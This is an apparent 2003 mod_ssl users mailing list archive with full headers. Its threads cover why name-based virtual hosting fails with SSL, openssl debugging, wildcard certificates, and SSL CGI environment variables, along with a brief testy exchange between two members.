
I don't know whether you are going through an extremely bad period in your 
life, or you're just a grumpy old man, but try and not take this out on 
others.  I'm sure the administrators of this mailing list did not intend 
this medium to be used for public abuse.

Regards,

Ian Newlands

----- Original Message -----
From: "Dave Paris" 
To: "Ian Newlands" 
Cc: 
Sent: Thursday, August 21, 2003 6:13 PM
Subject: Re:


>Ian,
>
>http://www.google.com/search?num=20&hl=en&lr=lang_en&ie=UTF- 
>8&safe=off&q=SSL+%22name+based+virtual+hosts%22&spell=1
>
>That's a Google query for:   SSL "name based virtual hosts"
>
>The very first hit is:   
>http://httpd.apache.org/docs/vhosts/name-based.html
>
>The summary text presented by Google reads:
>"Name-based Virtual Hosts
>   ... Name-based virtual hosting cannot be used with SSL secure servers  
>because
>   of the nature of the SSL protocol. ... Using Name-based Virtual Hosts.  
>..."
>
>If you don't like that one, there are 1,890 other matches .. several of  
>the first 20 clearly say in the summary text presented by Google that  you 
>can't do name-based virtual hosts with SSL.
>
>Please note I have not to date, nor am I now, calling you [insert  
>derogatory/deriding term or phrase here], nor am I saying you're a  
>worthless human.  I'm simply pointing out the obvious fact that the way  
>your mind seems to go about solving problems and researching does not  mesh 
>well with the tasks you're trying to accomplish.  You claim to  have spent 
>two MONTHS trying to find what I found in under 10 SECONDS.   That doesn't 
>make me one bit of a better person than you... it just  says that my mind 
>works in a way that is different from yours.  I'd  wager there are certain 
>tasks you accomplish quite easily that would  take me some effort.  It's 
>the way us humans seem to be designed.
>
>Every once in awhile, it's a good thing to look at who we are and what  
>we're good at and then review what we've chosen to do in life.  Doing a  
>job that meshes well with how you think can be all the difference  between 
>looking forward to an rewarding day at the office and a bruised  forehead 
>from repeatedly smashing your head against a wall in  self-frustration.  [ 
>of course, I'm omitting the forehead bruising  caused by external 
>influences like PHBs ;-) ]   As for the tone of your  note .. life's tough, 
>grab a helmet.
>
>Kind Regards,
>-dsp

_________________________________________________________________
ninemsn Extra Storage is now available. Get five times more storage - 10MB 
in your Hotmail account. Click here  http://join.msn.com/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 04:37:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 39AB9A8959; Fri, 22 Aug 2003 04:37:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id 1BB09A8935
	for ; Fri, 22 Aug 2003 04:37:33 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id 6F69B156551
	for ; Thu, 21 Aug 2003 22:37:31 -0400 (EDT)
Received: from w3works.com (64-212-200-28.nrp1feld.roc.ny.frontiernet.net [64.212.200.28])
	(using TLSv1 with cipher DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by texas.pobox.com (Postfix) with ESMTP id 1A15C453EE
	for ; Thu, 21 Aug 2003 22:37:30 -0400 (EDT)
Date: Thu, 21 Aug 2003 22:37:24 -0400
Subject: Re: 
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: 
Message-Id: <8FD668C4-D449-11D7-8765-000393464F32@w3works.com>
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


On Thursday, Aug 21, 2003, at 21:53 US/Eastern, Ian Newlands wrote:

> Dave
>
> Thank you for your reply, it was most enlightening and yes I will 
> re-assess my future as a human being.  Hopefully that statement 
> somehow makes you feel better about yourself.
> [...]

Get over yourself.  I went out of my way to make it COMPLETELY CLEAR 
that I was not intending my comments as any sort of insult or other 
attack on your intelligence or worth as a person.

-dsp

[once again, I'm reminded why I stopped contributing to listservs a few 
years back]

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 07:02:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 56E2AA8959; Fri, 22 Aug 2003 07:02:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id E17FFA8935
	for ; Fri, 22 Aug 2003 07:02:00 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h7M51qcS005637 for ; Fri, 22 Aug 2003 13:01:53 +0800 (CST)
Message-ID: <001c01c36869$0e503c60$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: <8FD668C4-D449-11D7-8765-000393464F32@w3works.com>
Subject: Re: SET payload factor ???
Date: Fri, 22 Aug 2003 12:51:29 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hiya.
How's it going Dave ?
Remember we were talking about ATM packet and payload factor ?
U mentioned something like payload to o/head @ 48/5. Were u talking about
S.E.T. ?
Am I looking at the right thing for very *high*  volumn, short duration,
24x7 operations ?
There's actually a small box inside those atms to capture the tx's when the
db of the acquirer bank is down and depending on the card, issuance is
almost guaranteed and the risk carried by the issuer bank.
I don't know what they are now for IBM atms, but last few years there is a
slow trend towards MS, scary thought.
I think (meaning I don't know fore sure) SET is the "smart card" version
with a chip. Relatively common in Hong Kong, don't know about USA.
Wish theres a vpn here.

----- Original Message -----
From: "Dave Paris" 
To: 
Sent: Friday, August 22, 2003 10:37 AM
Subject: Re:


>
> On Thursday, Aug 21, 2003, at 21:53 US/Eastern, Ian Newlands wrote:
>
> > Dave
> >
> > Thank you for your reply, it was most enlightening and yes I will
> > re-assess my future as a human being.  Hopefully that statement
> > somehow makes you feel better about yourself.
> > [...]
>
> Get over yourself.  I went out of my way to make it COMPLETELY CLEAR
> that I was not intending my comments as any sort of insult or other
> attack on your intelligence or worth as a person.
>
> -dsp
>
> [once again, I'm reminded why I stopped contributing to listservs a few
> years back]
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 12:28:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A98E0A8959; Fri, 22 Aug 2003 12:28:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id 5DE95A8935
	for ; Fri, 22 Aug 2003 12:28:17 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id 31538156479
	for ; Fri, 22 Aug 2003 06:28:16 -0400 (EDT)
Received: from w3works.com (64-212-200-28.nrp1feld.roc.ny.frontiernet.net [64.212.200.28])
	(using TLSv1 with cipher DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by texas.pobox.com (Postfix) with ESMTP id D589445356
	for ; Fri, 22 Aug 2003 06:28:14 -0400 (EDT)
Date: Fri, 22 Aug 2003 06:28:08 -0400
Subject: Re: SET payload factor ???
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <001c01c36869$0e503c60$0200a8c0@com>
Message-Id: <52B998F4-D48B-11D7-9D6C-000393464F32@w3works.com>
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I was referring to Asynchronous Transfer Mode transport-layer protocol 
- typically used on WAN and long-haul links.  Really doesn't have 
anything to do with SET or other applications.

-d

On Friday, Aug 22, 2003, at 00:51 US/Eastern, Arthur Chan wrote:

> Hiya.
> How's it going Dave ?
> Remember we were talking about ATM packet and payload factor ?
> U mentioned something like payload to o/head @ 48/5. Were u talking 
> about
> S.E.T. ?
> Am I looking at the right thing for very *high*  volumn, short 
> duration,
> 24x7 operations ?
> There's actually a small box inside those atms to capture the tx's 
> when the
> db of the acquirer bank is down and depending on the card, issuance is
> almost guaranteed and the risk carried by the issuer bank.
> I don't know what they are now for IBM atms, but last few years there 
> is a
> slow trend towards MS, scary thought.
> I think (meaning I don't know fore sure) SET is the "smart card" 
> version
> with a chip. Relatively common in Hong Kong, don't know about USA.
> Wish theres a vpn here.
> [...]

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 12:33:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5F559A8959; Fri, 22 Aug 2003 12:33:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hitpro.hitachi.co.jp (hitpro.hitachi.co.jp [133.145.224.7])
	by master.modssl.org (Postfix) with ESMTP id 96B1EA8935
	for ; Fri, 22 Aug 2003 12:33:11 +0200 (CEST)
Received: from mc3.mcg.hitachi.co.jp by hitpro.hitachi.co.jp (8.12.9/eHI-hitpro) id h7MAX8oo008431; Fri, 22 Aug 2003 19:33:08 +0900 (JST)
Received: (from root@localhost)
	by mc3.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h7MAX7S21242
	for ; Fri, 22 Aug 2003 19:33:07 +0900 (JST)
Received: from unknown [192.168.2.1] by mc3.mcg.hitachi.co.jp with SMTP id VAA21239 ; Fri, 22 Aug 2003 19:33:07 +0900
Received: from navsg1.hitachi.co.jp by navsg1.hitachi.co.jp (8.9.3/3.7W-navsg1) id TAA23650; Fri, 22 Aug 2003 19:33:04 +0900 (JST)
Received: from mlsv4.itg.hitachi.co.jp ([158.213.165.103])
 by navsg1.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003082219330317306
 ; Fri, 22 Aug 2003 19:33:03 +0900
Received: from navgw5.itg.hitachi.co.jp by mlsv4.itg.hitachi.co.jp (8.12.6/8.12.6) id h7MAWvms025682; Fri, 22 Aug 2003 19:33:03 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw5.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003082219330203253
 ; Fri, 22 Aug 2003 19:33:02 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id TAA20993;
	Fri, 22 Aug 2003 19:33:03 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h7MAX2684894;
	Fri, 22 Aug 2003 19:33:02 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Fri, 22 Aug 2003 19:32:21 +0900 (JST)
Message-Id: <20030822.193221.74680003.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, iannewlands@hotmail.com
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: virtual hosting
From: Kiyoshi Watanabe 
In-Reply-To: 
References: 
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello, 

> I am currently running about 15 virtual hosts using name based on port 80, 
> and 1 virtual host using SSL.

I assume that you have only one virtual host for SSL in your conf.
 
> My SSL host is currently working with the following:
> 
>     
> 
> However I want to change this to the IP based hosting for this host, 
> I tried changing this to the following:
> 
>     
> 
> By doing this my SSL virtual host stops working altogether.
> 
> I try the following to debug it on a remote machine:
> 
>     # openssl s_client -connect 203.xxx.xxx.xxx:443
>     CONNECTED(00000003)
>     27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown 
> protocol:s23_clnt.c:475:

I see simlilar problems several times. From my little experience, this
happends when you access the virtual host where the sslengine is not
on.

This is caused by probably: 
 1) You do not specify the SSL engine on in the directive.
    (Probably not because you just changed from _default_:443)
 2) Your virtual host is not working (happends when you try to have multiple
    ssl hosts). But even happends when you set a differnt IP from the
    one in your inet addr (even you have a one virtual host).
 3) You have several ethernet HWs working and for a example use the eth0 for
    openssl command and eth1 for ssl.conf.

> Can anyone suggest might be wrong here?

I can only tell that xxx.xxx.xxx parts of your two IP addresses are
probably not set correctly. If you could tell exact info on the conf
and ifconfig, I may be able to suggest more.

-Kiyoshi
Kiyoshi Watanabe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 15:04:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F3479A8959; Fri, 22 Aug 2003 15:04:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail9.messagelabs.com (mail9.messagelabs.com [194.205.110.133])
	by master.modssl.org (Postfix) with SMTP id AB31DA8935
	for ; Fri, 22 Aug 2003 15:03:59 +0200 (CEST)
X-VirusChecked: Checked
X-Env-Sender: John.Boocock@capita.co.uk
X-Msg-Ref: server-2.tower-9.messagelabs.com!1061557424!497081
X-StarScan-Version: 5.0.7; banners=-,-,-
Received: (qmail 17328 invoked from network); 22 Aug 2003 13:03:50 -0000
Received: from mailhost.capita.co.uk (HELO cbsrfw65-ext.capita.co.uk) (194.129.126.228)
  by server-2.tower-9.messagelabs.com with SMTP; 22 Aug 2003 13:03:50 -0000
Received: from mailscan.capita.co.uk by cbsrfw65-ext.capita.co.uk
          via smtpd (for mail9.messagelabs.com [194.205.110.133]) with SMTP; 22 Aug 2003 13:03:46 UT
Received: from cbsrfw65-msw.capita.co.uk (unverified) by capitawemmime01.capita.co.uk
 (Content Technologies SMTPRS 4.2.5) with SMTP id  for ;
 Fri, 22 Aug 2003 14:03:40 +0100
Received: from no.name.available by cbsrfw65-msw.capita.co.uk
          via smtpd (for mailscan.capita.co.uk [10.100.10.161]) with SMTP; 22 Aug 2003 13:03:41 UT
Received: by EMS-CENROU1 with Internet Mail Service (5.5.2653.19)
	id ; Fri, 22 Aug 2003 14:03:41 +0100
Message-ID: <7DBC75A20662EE4C8BC92579DDB7E8554E9E78@IMCR-MAIL>
From: "Boocock, John (Academy)" 
To: "'modssl-users@modssl.org'" 
Subject: RE: virtual hosting
Date: Fri, 22 Aug 2003 14:03:36 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boocock, John (Academy)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Although I'm sure that most people get quite bored and frustrated about
questions on virtual hosting that have appeared countless times in the
archives I don't think I've ever noticed what I was wondering being
answered.

If you had a wildcard certificate which worked for *.domain.com, would name
virtual hosting be possible then assuming that all your virtual hosts were
things like "secure.domain.com" and "basket.domain.com" as they are actually
all using the same wildcard certificate for the SSL handshake.

If anyone could answer that, it would be great and potentially save some
messing when it comes to IP addresses.

Cheers

JB

-----Original Message-----
From: Dave Paris [mailto:dparis@w3works.com] 
Sent: 21 August 2003 04:59
To: modssl-users@modssl.org
Cc: Ian Newlands
Subject: Re: virtual hosting


geeze.  is it that time of the month already for this question?  seems 
like it was just yesterday when it was asked last .. maybe I'm just 
thinking of the other 100,000 times it was asked.

in all seriousness, this dead horse has been beaten so many times on 
this list there isn't even a carcass left to hit at this point.  please 
go dig through the mail list archives to see why name-based virtual 
hosts don't work with SSL.

yes, that's a flippant answer.  no, you're not likely to get a reply 
any more serious.

-dsp

On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:

> I am currently running about 15 virtual hosts using name based on port
> 80, and 1 virtual host using SSL.
>
> My SSL host is currently working with the following:
>
>    
>
> However I want to change this to the IP based hosting for this host,
> allowing me to then add more SSL based virtual hosts on this setup, so 
> I tried changing this to the following:
>
>    
>
> By doing this my SSL virtual host stops working altogether.
>
> I try the following to debug it on a remote machine:
>
>    # openssl s_client -connect 203.xxx.xxx.xxx:443
>    CONNECTED(00000003)
>    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:s23_clnt.c:475:
>
> I do the exact same thing on the local machine and it responds with a
> valid SSL response.
>
> Can anyone suggest might be wrong here?
>
> Regards,
>
> Ian Newlands
>
> _________________________________________________________________
> Hotmail is now available on Australian mobile phones. Go to
> http://ninemsn.com.au/mobilecentral/signup.asp
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This email has been scanned for all viruses by the MessageLabs SkyScan
service.


**********************************************************************************
This email and any files transmitted with it are confidential, and may be subject to legal privilege, and are intended solely for the use of the individual or entity to whom they are addressed.  
If you have received this email in error or think you may have done so, you may not peruse, use, disseminate, distribute or copy this message. Please notify the sender immediately and delete the original e-mail from your system.

Computer viruses can be transmitted by e-mail. Recipients should check this e-mail for the presence of viruses. The Capita Group and its subsidiaries accept no liability for any damage caused by any virus transmitted by this e-mail.
***********************************************************************************

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 20:43:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3BDB2A8959; Fri, 22 Aug 2003 20:43:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gonk.valueweb.net (gonk.valueweb.net [216.219.253.46])
	by master.modssl.org (Postfix) with ESMTP id 72D75A8935
	for ; Fri, 22 Aug 2003 20:42:27 +0200 (CEST)
Received: (from pchampon@localhost)
	by gonk.valueweb.net (8.12.9/8.12.9) id h7MIgPbt013919
	for modssl-users@modssl.org; Fri, 22 Aug 2003 14:42:25 -0400 (EDT)
Date: Fri, 22 Aug 2003 14:42:25 -0400
From: Philip Champon 
To: modssl-users@modssl.org
Subject: Re: CGI/SSL spec?
Message-ID: <20030822184224.GB12409@gonk.valueweb.net>
References: <20030724182555.GC8278@gonk.valueweb.net> <3F44052A.3030404@fpsn.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3F44052A.3030404@fpsn.net>
User-Agent: Mutt/1.3.99i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Philip Champon 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks, but I was more so looking to find out if there was some sort of
formal spec that the mod_ssl team used to decide what SSL environment
variables to create. I am making some changes to stunnel to support http
proxying and I wanted to include some headers for user CGIs. Since I can
not find any spec, describing what SSL environment variables are expected,
I have simply chosen to insert the headers X-Https and X-Session-Id.

Thus spake Colin Faber, on the year of our L*rd Wed, Aug 20, 2003 at 05:32:58PM -0600:
> Dumping the environment variables is a very simple task. Try:
> 
> 
> #!/bin/sh
> echo "Content-type: text/plain"
> echo ""
> /usr/bin/printenv
> 
> 
> chmod it and stick it on your SSL server and run it.
> 
> 
> Philip Champon wrote:
> 
> >Hi,
> >
> >I tried searching the archives, to find out where I might be able
> >to read about a CGI/SSL spec, but I couldn't turn anything up?
> >While I have read the mod_ssl ref on envirionment variables, I was
> >hoping to find out what source the group used to compile this list
> >of environment variables. I also consulted the CGI spec, but it did
> >not cover any SSL specific variables.
> >
> >Could someone tell me, is there such a spec, or did the group arbitrarily
> >compile a list of SSL env vars to include in the CGI env?
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Philip Champon Affinity Developer
Ph - 954-334-8156
Em - pchampon@valueweb.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 22 21:51:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B00D9A8959; Fri, 22 Aug 2003 21:51:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wink.pobox.com (wink.pobox.com [207.106.49.21])
	by master.modssl.org (Postfix) with ESMTP id C1B97A8935
	for ; Fri, 22 Aug 2003 21:50:35 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by wink.pobox.com (Postfix) with ESMTP id D8FB3FD75
	for ; Fri, 22 Aug 2003 15:50:33 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id 1DE6245359
	for ; Fri, 22 Aug 2003 15:50:33 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: CGI/SSL spec?
Date: Fri, 22 Aug 2003 15:50:37 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <20030822184224.GB12409@gonk.valueweb.net>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

http://www.apache-ssl.org/docs.html#CGI

but there is no RFC for SSL envvars that I'm aware of.  mod_ssl offers a
more complete list than is shown above.  This can be found at:

http://www.modssl.org/docs/2.8/ssl_reference.html#ToC25

since the server is what's setting the environment variable, you need to go
by the documentation you're working with.  A good example of a popular, yet
optional envvar is HTTP_REFERER .. this is a completely optional envvar left
up to the browser's implementation team.  So, to depend on this variable,
you need to be positive of the client hitting your server.  Likewise the SSL
envvars.

Regards,
-dsp


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Philip Champon
Sent: Friday, August 22, 2003 2:42 PM
To: modssl-users@modssl.org
Subject: Re: CGI/SSL spec?


Thanks, but I was more so looking to find out if there was some sort of
formal spec that the mod_ssl team used to decide what SSL environment
variables to create. I am making some changes to stunnel to support http
proxying and I wanted to include some headers for user CGIs. Since I can
not find any spec, describing what SSL environment variables are expected,
I have simply chosen to insert the headers X-Https and X-Session-Id.

Thus spake Colin Faber, on the year of our L*rd Wed, Aug 20, 2003 at
05:32:58PM -0600:
> Dumping the environment variables is a very simple task. Try:
>
>
> #!/bin/sh
> echo "Content-type: text/plain"
> echo ""
> /usr/bin/printenv
>
>
> chmod it and stick it on your SSL server and run it.
>
>
> Philip Champon wrote:
>
> >Hi,
> >
> >I tried searching the archives, to find out where I might be able
> >to read about a CGI/SSL spec, but I couldn't turn anything up?
> >While I have read the mod_ssl ref on envirionment variables, I was
> >hoping to find out what source the group used to compile this list
> >of environment variables. I also consulted the CGI spec, but it did
> >not cover any SSL specific variables.
> >
> >Could someone tell me, is there such a spec, or did the group arbitrarily
> >compile a list of SSL env vars to include in the CGI env?
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
Philip Champon Affinity Developer
Ph - 954-334-8156
Em - pchampon@valueweb.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 25 16:36:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B9F04A8938; Mon, 25 Aug 2003 16:36:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail4.hitachi.co.jp (mail4.hitachi.co.jp [133.145.228.5])
	by master.modssl.org (Postfix) with ESMTP id 8C615A8933
	for ; Mon, 25 Aug 2003 16:36:00 +0200 (CEST)
Received: from mc2.mcg.hitachi.co.jp by mail4.hitachi.co.jp (8.9.3p2/3.7W-mail4) id XAA16317; Mon, 25 Aug 2003 23:35:57 +0900 (JST)
Received: (from root@localhost)
	by mc2.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h7PEZuq00666
	for ; Mon, 25 Aug 2003 23:35:56 +0900 (JST)
Received: from unknown [192.168.2.1] by mc2.mcg.hitachi.co.jp with SMTP id ZAA00665 ; Mon, 25 Aug 2003 23:35:55 +0900
Received: from navsg3.hitachi.co.jp by navsg3.hitachi.co.jp (8.9.3/3.7W-navsg3) id XAA29705; Mon, 25 Aug 2003 23:35:55 +0900 (JST)
Received: from mlsv5.itg.hitachi.co.jp ([158.213.165.104])
 by navsg3.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003082523355500289
 ; Mon, 25 Aug 2003 23:35:55 +0900
Received: from navgw14.itg.hitachi.co.jp by mlsv5.itg.hitachi.co.jp (8.12.6/8.12.6) id h7PEZnon008180; Mon, 25 Aug 2003 23:35:55 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw14.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003082523355406666
 ; Mon, 25 Aug 2003 23:35:54 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id XAA21582;
	Mon, 25 Aug 2003 23:35:55 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h7PEZs669335;
	Mon, 25 Aug 2003 23:35:54 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Mon, 25 Aug 2003 23:35:09 +0900 (JST)
Message-Id: <20030825.233509.74672024.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, John.Boocock@capita.co.uk
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: virtual hosting
From: Kiyoshi Watanabe 
In-Reply-To: <7DBC75A20662EE4C8BC92579DDB7E8554E9E78@IMCR-MAIL>
References: <7DBC75A20662EE4C8BC92579DDB7E8554E9E78@IMCR-MAIL>
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi John,

> If you had a wildcard certificate which worked for *.domain.com, would name
> virtual hosting be possible then assuming that all your virtual hosts were
> things like "secure.domain.com" and "basket.domain.com" as they are actually
